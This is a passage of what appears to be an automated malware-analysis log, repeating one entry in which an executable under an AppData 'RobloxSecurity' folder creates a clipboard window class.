                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
                  Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exeWindow created: window name: CLIPBRDWNDCLASSJump to behavior
